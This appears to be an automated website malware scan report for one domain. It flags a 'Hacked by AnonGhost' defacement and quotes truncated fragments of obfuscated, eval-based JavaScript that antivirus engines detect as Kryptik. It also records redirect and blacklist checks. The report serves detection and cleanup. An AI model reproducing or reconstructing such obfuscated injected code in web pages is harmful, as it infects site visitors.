New scan:

Malware Scanner report for openaboutiquenow.com

Malicious/Suspicious/Total urls checked
2/0/2
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by AnonGhost  (2195 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://openaboutiquenow.com/
200 OK
Content-Length: 24054
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

var _7718;var _7747='37125C189F133A1901E2036D1973F1874F2027E1928A1982E1973B1271D1973E1892F2054A1766D1928B1973F1883C1982E2054E1424D1343B2036E2009A1955C1352F1271B2090E1073E1064E1991E1982D1991D2036E1991B1766C1928D1973B1883C1982E2054D1424F1271E1532E1271D2054B1928C1973E1883C1982A2054C1397D1982C1991F1892E1973B1343A1073A1064D1064D2036B2009B1955D1379F1073B1064D1064A1289B1991B1982A1991A1748E1991F1766B1928A1973D1883C1982C2054B1424A1289E1379D1073A1064D1064D1289D1919E1892F1928E1910B1919D2027F1532E1433A1415A
... 20355 bytes are skipped ...
9866[_7111](_2323[1])/21);var _3512=(_7111==9)?String:eval;_6929='';_11=_9866[_7111](_2323[0])/_9866[_7111](_2323[1]);for(_7718=3;_7718<_11;_7718++)_6929+=(_9866[_7111-2]((_9866[_7111](_2323[_7718])+_9866[_7111](_2323[2])+_9866[_7111](_2323[1]))/_9866[_7111](_2323[1])-_9866[_7111](_2323[2])+_9866[_7111](_2323[1])-1));var _6798='_6734';var _7661='_6798=_6929';function _1493(_2964){_3512(_2083);_1493(_2930);_2930(_7661);_1493(_6798);}var _2083='_1493=_3512';var _2930='_2930=_1493';_1493(_5768);

Antivirus reports:

Norman
Kryptik.CCJB
ESET-NOD32
JS/Kryptik.ALB

Deface/Content modification. The following signature was found: Hacked by AnonGhost

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="shortcut icon" href="http://www.iconj.com/ico/z/p/zpsi90lfc7.ico" type="image/x-icon" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Hacked by AnonGhost</title><style type="text/css"><!-- body { background-color: #000000; margin-left: 0px; margin-top: 0px; text-align: center; background-repeat: repeat-x;} --><!-- Made By Virusa Worm --></style></head><body bgColor="#000000" onload="teclear();"oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'><table width="781" border="0" align="center" cellpadding="0"
...[23707 bytes skipped]...


http://openaboutiquenow.com/test404page.js
200 OK
Content-Length: 24054
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _7718;var _7747='37125C189F133A1901E2036D1973F1874F2027E1928A1982E1973B1271D1973E1892F2054A1766D1928B1973F1883C1982E2054E1424D1343B2036E2009A1955C1352F1271B2090E1073E1064E1991E1982D1991D2036E1991B1766C1928D1973B1883C1982E2054D1424F1271E1532E1271D2054B1928C1973E1883C1982A2054C1397D1982C1991F1892E1973B1343A1073A1064D1064D2036B2009B1955D1379F1073B1064D1064A1289B1991B1982A1991A1748E1991F1766B1928A1973D1883C1982C2054B1424A1289E1379D1073A1064D1064D1289D1919E1892F1928E1910B1919D2027F1532E1433A1415A
... 20355 bytes are skipped ...
9866[_7111](_2323[1])/21);var _3512=(_7111==9)?String:eval;_6929='';_11=_9866[_7111](_2323[0])/_9866[_7111](_2323[1]);for(_7718=3;_7718<_11;_7718++)_6929+=(_9866[_7111-2]((_9866[_7111](_2323[_7718])+_9866[_7111](_2323[2])+_9866[_7111](_2323[1]))/_9866[_7111](_2323[1])-_9866[_7111](_2323[2])+_9866[_7111](_2323[1])-1));var _6798='_6734';var _7661='_6798=_6929';function _1493(_2964){_3512(_2083);_1493(_2930);_2930(_7661);_1493(_6798);}var _2083='_1493=_3512';var _2930='_2930=_1493';_1493(_5768);

Antivirus reports:

Norman
Kryptik.CCJB
ESET-NOD32
JS/Kryptik.ALB


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: openaboutiquenow.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 07:12:03 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Type: text/html
X-Powered-By: PHP/5.3.23
Second query (visit from search engine):
GET / HTTP/1.1
Host: openaboutiquenow.com
Referer: http://www.google.com/search?q=openaboutiquenow.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=openaboutiquenow.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://openaboutiquenow.com/

Result: openaboutiquenow.com is not infected or malware details are not published yet.